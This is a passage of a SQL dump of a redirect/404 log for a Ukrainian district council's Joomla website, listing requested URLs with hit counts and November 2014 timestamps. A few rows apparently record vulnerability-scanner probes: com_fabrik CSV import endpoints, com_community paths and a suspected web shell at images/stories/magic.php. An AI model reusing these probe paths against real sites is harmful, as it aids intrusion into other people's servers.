00:00:00',301),(10796,'http://malyn-rayrada.org.ua/index.php/--25072012-','','','',6,0,'2014-11-12 20:12:23','0000-00-00 00:00:00',301),(10797,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-11-12 20:21:54','0000-00-00 00:00:00',301),(10798,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1059:2013-07-24-05-42-15&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-12 20:29:34','0000-00-00 00:00:00',301),(10799,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-12 20:34:15','0000-00-00 00:00:00',301),(10800,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-12 20:55:29','0000-00-00 00:00:00',301),(10801,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1235:2014-03-06-13-25-26&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 22:03:31','0000-00-00 00:00:00',301),(10802,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1003:1&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 22:03:53','0000-00-00 00:00:00',301),(10803,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1056:-22-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-12 22:04:00','0000-00-00 00:00:00',301),(10804,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-12 23:45:58','0000-00-00 00:00:00',301),(10805,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/105-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2010','',6,0,'2014-11-12 23:53:56','0000-00-00 00:00:00',301),(10806,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1303:2014-04-29-13-13-18&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-13 00:09:40','0000-00-00 00:00:00',301),(10807,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-13 00:15:54','0000-00-00 00:00:00',301),(10808,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=5:2011-04-06-12-11-26&lang=uk','','','',1,0,'2014-11-13 00:34:02','0000-00-00 00:00:00',301),(10809,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1060:2013-07-27-10-13-15&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-13 01:43:50','0000-00-00 00:00:00',301),(10810,'http://www.malyn-rayrada.org.ua/nouveau_site/components/com_community/index.html','','','',1,0,'2014-11-13 01:46:26','0000-00-00 00:00:00',301),(10811,'http://www.malyn-rayrada.org.ua/nouveau_site/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-13 01:46:30','0000-00-00 00:00:00',301),(10812,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=924:2013-02-20-19-06-08&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 02:45:37','0000-00-00 00:00:00',301),(10813,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1041:2013-07-02-13-55-38&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-11-13 03:04:22','0000-00-00 00:00:00',301),(10814,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=962:-2017-&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-13 03:18:21','0000-00-00 00:00:00',301),(10815,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1327:2014-06-01-11-51-13&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-13 04:19:24','0000-00-00 00:00:00',301),(10816,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=ru&Itemid=','','','',5,0,'2014-11-13 04:48:59','0000-00-00 00:00:00',301),(10817,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1119:2013-10-25-12-26-37&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-13 04:52:18','0000-00-00 00:00:00',301),(10818,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1097:2013-09-25-08-35-50&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-13 04:52:36','0000-00-00 00:00:00',301),(10819,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1334:2014-06-06-05-54-20&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-13 04:52:38','0000-00-00 00:00:00',301),(10820,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47:--21022013-&Itemid=86&lang=uk','','','',1,0,'2014-11-13 05:46:53','0000-00-00 00:00:00',301),(10821,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=919:2013-01-31-10-15-40&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-13 05:53:26','0000-00-00 00:00:00',301),(10822,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1163:2013-12-20-07-44-35&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-13 05:53:40','0000-00-00 00:00:00',301),(10823,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47:--21022013-&Itemid=86&lang=ru','','','',4,0,'2014-11-13 06:01:51','0000-00-00 00:00:00',301),(10824,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1291:2014-04-23-11-37-34&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 06:26:17','0000-00-00 00:00:00',301),(10825,'http://www.malyn-rayrada.org.ua/archive/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-13 06:44:33','0000-00-00 00:00:00',301),(10826,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1351:-2014-&catid=59:--20062014-&Itemid=107&lang=uk','','','',2,0,'2014-11-13 07:07:58','0000-00-00 00:00:00',301),(10827,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-11-13 07:08:02','0000-00-00 00:00:00',301),(10828,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1021:-l-r&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-13 07:28:31','0000-00-00 00:00:00',301),(10829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-13 07:34:18','0000-00-00 00:00:00',301),(10830,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1092:2013-09-19-12-18-37&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-13 08:00:28','0000-00-00 00:00:00',301),(10831,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1170:2014-01-08-11-02-06&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 08:00:51','0000-00-00 00:00:00',301),(10832,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1257:2014-03-29-18-03-31&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-13 08:00:54','0000-00-00 00:00:00',301),(10833,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1362:-------2015-----------&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-13 09:03:20','0000-00-00 00:00:00',301),(10834,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=929:2013-02-21-09-11-26&lang=en&option=com_content&view=article','','','',1,0,'2014-11-13 09:03:46','0000-00-00 00:00:00',301),(10835,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1247:2014-03-20-14-37-15&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 09:04:11','0000-00-00 00:00:00',301),(10836,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1000:1&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-13 09:04:15','0000-00-00 00:00:00',301),(10837,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=uk','','','',5,0,'2014-11-13 09:15:21','0000-00-00 00:00:00',301),(10838,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1280:-2014-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-13 09:34:53','0000-00-00 00:00:00',301),(10839,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1088:2013-09-19-12-06-07&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-13 10:37:18','0000-00-00 00:00:00',301),(10840,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1121:-24-6-&lang=en&option=com_content&view=article','','','',1,0,'2014-11-13 10:37:47','0000-00-00 00:00:00',301),(10841,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-11-13 10:58:56','0000-00-00 00:00:00',301),(10842,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=991:2013-04-22-08-24-54&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-13 11:10:32','0000-00-00 00:00:00',301),(10843,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=981:2013-04-03-07-23-01&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-13 11:10:37','0000-00-00 00:00:00',301),(10844,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=984:-20-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 12:12:06','0000-00-00 00:00:00',301),(10845,'http://www.malyn-rayrada.org.ua/index.php?Itemid=7&id=3&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2014-11-13 12:12:15','0000-00-00 00:00:00',301),(10846,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1072:-24-6-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-13 13:45:14','0000-00-00 00:00:00',301),(10847,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=982:2013-04-03-11-58-18&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-13 13:45:38','0000-00-00 00:00:00',301),(10848,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1129:2013-11-06-13-36-25&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 13:45:51','0000-00-00 00:00:00',301),(10849,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1347:2014-06-19-11-19-16&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 14:18:03','0000-00-00 00:00:00',301),(10850,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1004:2013-05-04-11-41-00&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 15:19:30','0000-00-00 00:00:00',301),(10851,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-13 15:24:42','0000-00-00 00:00:00',301),(10852,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1278:2014-04-11-13-44-30&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-13 15:52:06','0000-00-00 00:00:00',301),(10853,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1324:2014-05-27-13-24-07&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 15:52:40','0000-00-00 00:00:00',301),(10854,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-13 16:39:21','0000-00-00 00:00:00',301),(10855,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1051:--------4------&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-13 16:53:17','0000-00-00 00:00:00',301),(10856,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-13 17:06:28','0000-00-00 00:00:00',301),(10857,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-11-13 17:20:55','0000-00-00 00:00:00',301),(10858,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-13 17:35:45','0000-00-00 00:00:00',301),(10859,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-11-13 18:03:16','0000-00-00 00:00:00',301),(10860,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1061:2013-07-29-08-58-16&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-13 18:40:12','0000-00-00 00:00:00',301),(10861,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1176:-27-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 18:40:31','0000-00-00 00:00:00',301),(10862,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1300:2014-04-25-07-21-54&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 18:40:35','0000-00-00 00:00:00',301),(10863,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1143:2013-11-26-13-23-37&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-13 18:40:38','0000-00-00 00:00:00',301),(10864,'http://www.malyn-rayrada.org.ua/photo/components/com_community/index.html','','','',1,0,'2014-11-13 19:17:21','0000-00-00 00:00:00',301),(10865,'http://www.malyn-rayrada.org.ua/photo/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-13 19:17:25','0000-00-00 00:00:00',301),(10866,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1050:2013-07-15-13-52-21&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 20:34:35','0000-00-00 00:00:00',301),(10867,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1021:-l-r&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-13 20:34:38','0000-00-00 00:00:00',301),(10868,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1052:2013-07-19-11-32-33&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-13 21:34:27','0000-00-00 00:00:00',301),(10869,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1156:2013-12-09-07-12-03&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-13 21:34:33','0000-00-00 00:00:00',301),(10870,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=955:2013-03-07-06-31-04&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-13 21:34:36','0000-00-00 00:00:00',301),(10871,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=uk','','','',2,0,'2014-11-13 21:38:11','0000-00-00 00:00:00',301),(10872,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=501:2011-12-14-13-07-32&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-13 21:47:20','0000-00-00 00:00:00',301),(10873,'http://www.malyn-rayrada.org.ua/index.php?Itemid=93&catid=52:--16082013-&id=1067:2013-08-16-15-28-50&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-13 22:09:12','0000-00-00 00:00:00',301),(10874,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1284:2014-04-17-13-00-18&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-13 22:09:19','0000-00-00 00:00:00',301),(10875,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=en&Itemid=0','','','',9,0,'2014-11-13 22:43:22','0000-00-00 00:00:00',301),(10876,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1217:2014-02-21-13-52-36&lang=ru&option=com_content&view=article','','','',5,0,'2014-11-13 23:20:36','0000-00-00 00:00:00',301),(10877,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1319:--------2014--&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-13 23:42:40','0000-00-00 00:00:00',301),(10878,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-13 23:58:12','0000-00-00 00:00:00',301),(10879,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=uk','','','',8,0,'2014-11-14 00:07:53','0000-00-00 00:00:00',301),(10880,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1242:-25-2011-74-19-2011-193-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-14 01:16:50','0000-00-00 00:00:00',301),(10881,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1214:2014-02-18-09-51-45&lang=uk&option=com_content&view=article','','','',6,0,'2014-11-14 02:17:05','0000-00-00 00:00:00',301),(10882,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=957:199-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-14 02:27:42','0000-00-00 00:00:00',301),(10883,'http://malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1338:2014-06-11-14-18-06&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-11-14 03:13:56','0000-00-00 00:00:00',301),(10884,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1118:2013-10-25-12-24-30&lang=en&option=com_content&view=article','','','',2,0,'2014-11-14 03:52:15','0000-00-00 00:00:00',301),(10885,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1266:2014-04-03-05-25-14&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-14 04:01:13','0000-00-00 00:00:00',301),(10886,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1081:-2013-2017-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-14 05:34:18','0000-00-00 00:00:00',301),(10887,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1274:----------------l--r&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-14 05:34:44','0000-00-00 00:00:00',301),(10888,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1242:-25-2011-74-19-2011-193-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-14 05:34:46','0000-00-00 00:00:00',301),(10889,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=998:1&lang=en&option=com_content&view=article','','','',2,0,'2014-11-14 06:02:51','0000-00-00 00:00:00',301),(10890,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1338:2014-06-11-14-18-06&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-14 08:41:35','0000-00-00 00:00:00',301),(10891,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1024:----l---------2011-2014-r-&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-14 08:41:40','0000-00-00 00:00:00',301),(10892,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1266:2014-04-03-05-25-14&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-14 09:14:20','0000-00-00 00:00:00',301),(10893,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&id=1&lang=en&option=com_phocagallery&view=category','','','',1,0,'2014-11-14 09:14:25','0000-00-00 00:00:00',301),(10894,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1112:2013-10-23-09-24-43&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-14 10:15:11','0000-00-00 00:00:00',301),(10895,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1099:-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-14 12:25:05','0000-00-00 00:00:00',301),(10896,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=uk&Itemid=','','','',8,0,'2014-11-14 12:38:09','0000-00-00 00:00:00',301),(10897,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-14 13:08:04','0000-00-00 00:00:00',301),(10898,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-14 13:35:38','0000-00-00 00:00:00',301),(10899,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-14 13:53:07','0000-00-00 00:00:00',301),(10900,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-14 14:14:47','0000-00-00 00:00:00',301),(10901,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-11-14 14:23:46','0000-00-00 00:00:00',301),(10902,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-11-14 14:26:13','0000-00-00 00:00:00',301),(10903,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-11-14 15:06:32','0000-00-00 00:00:00',301),(10904,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-11-14 15:07:45','0000-00-00 00:00:00',301),(10905,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1339:2014-06-12-09-22-34&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-14 15:36:32','0000-00-00 00:00:00',301),(10906,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&Itemid=14&lang=en','','','',7,0,'2014-11-14 16:14:20','0000-00-00 00:00:00',301),(10907,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1235:2014-03-06-13-25-26&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-14 16:29:44','0000-00-00 00:00:00',301),(10908,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-11-14 16:30:38','0000-00-00 00:00:00',301),(10909,'http://www.malyn-rayrada.org.ua/index.php?Itemid&id=10:2013-02-22-07-29-10&lang=ru&option=com_poll','','','',4,0,'2014-11-14 16:33:59','0000-00-00 00:00:00',301),(10910,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1113:2013-10-23-09-26-07&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-14 18:02:31','0000-00-00 00:00:00',301),(10911,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1231:-q-q&lang=en&option=com_content&view=article','','','',1,0,'2014-11-14 18:08:51','0000-00-00 00:00:00',301),(10912,'http://malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1365:2014-07-10-13-58-58&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-11-14 19:13:53','0000-00-00 00:00:00',301),(10913,'http://www.malyn-rayrada.org.ua/images/stories/magic.php','','','',1,0,'2014-11-14 20:33:52','0000-00-00 00:00:00',301),(10914,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1218:2014-02-21-15-02-18&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-15 00:15:53','0000-00-00 00:00:00',301),(10915,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=942:-19-6-&lang=en&option=com_content&view=article','','','',1,0,'2014-11-15 00:15:56','0000-00-00 00:00:00',301),(10916,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1099:-l-r&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-15 00:15:59','0000-00-00 00:00:00',301),(10917,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1216:-q-q&lang=ru&option=com_content&view=article','','','',5,0,'2014-11-15 00:28:52','0000-00-00 00:00:00',301),(10918,'http://malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=ru&Itemid=','','','',4,0,'2014-11-15 01:02:16','0000-00-00 00:00:00',301),(10919,'http://malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=ru&Itemid=0','','','',4,0,'2014-11-15 01:10:08','0000-00-00 00:00:00',301),(10920,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=ru&Itemid=0','','','',2,0,'2014-11-15 01:38:31','0000-00-00 00:00:00',301),(10921,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=en&Itemid=','','','',5,0,'2014-11-15 01:45:34','0000-00-00 00:00:00',301),(10922,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1264:2014-04-01-11-27-13&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-15 02:04:15','0000-00-00 00:00:00',301),(10923,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-11-15 03:15:10','0000-00-00 00:00:00',301),(10924,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1157:-11-2013-&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-15 03:22:56','0000-00-00 00:00:00',301),(10925,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1372:2014-08-04-19-26-16&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-15 05:37:11','0000-00-00 00:00:00',301),(10926,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=954:-19-6-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-15 06:29:43','0000-00-00 00:00:00',301),(10927,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1079:------l---2011-2013-r&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-15 07:33:48','0000-00-00 00:00:00',301),(10928,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1008:2013-05-20-07-02-57&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-15 07:33:50','0000-00-00 00:00:00',301),(10929,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1083:------------2014-&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-15 08:03:31','0000-00-00 00:00:00',301),(10930,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51:--19072013-&Itemid=92&lang=ru','','','',5,0,'2014-11-15 08:13:01','0000-00-00 00:00:00',301),(10931,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1201:2014-01-31-07-43-11&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-15 09:09:48','0000-00-00 00:00:00',301),(10932,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1227:2014-02-25-07-36-58&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-15 09:36:32','0000-00-00 00:00:00',301),(10933,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1295:-2014-&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-15 09:36:57','0000-00-00 00:00:00',301),(10934,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1098:2013-09-25-09-34-57&lang=uk&option=com_content&view=article','','','',5,0,'2014-11-15 09:37:02','0000-00-00 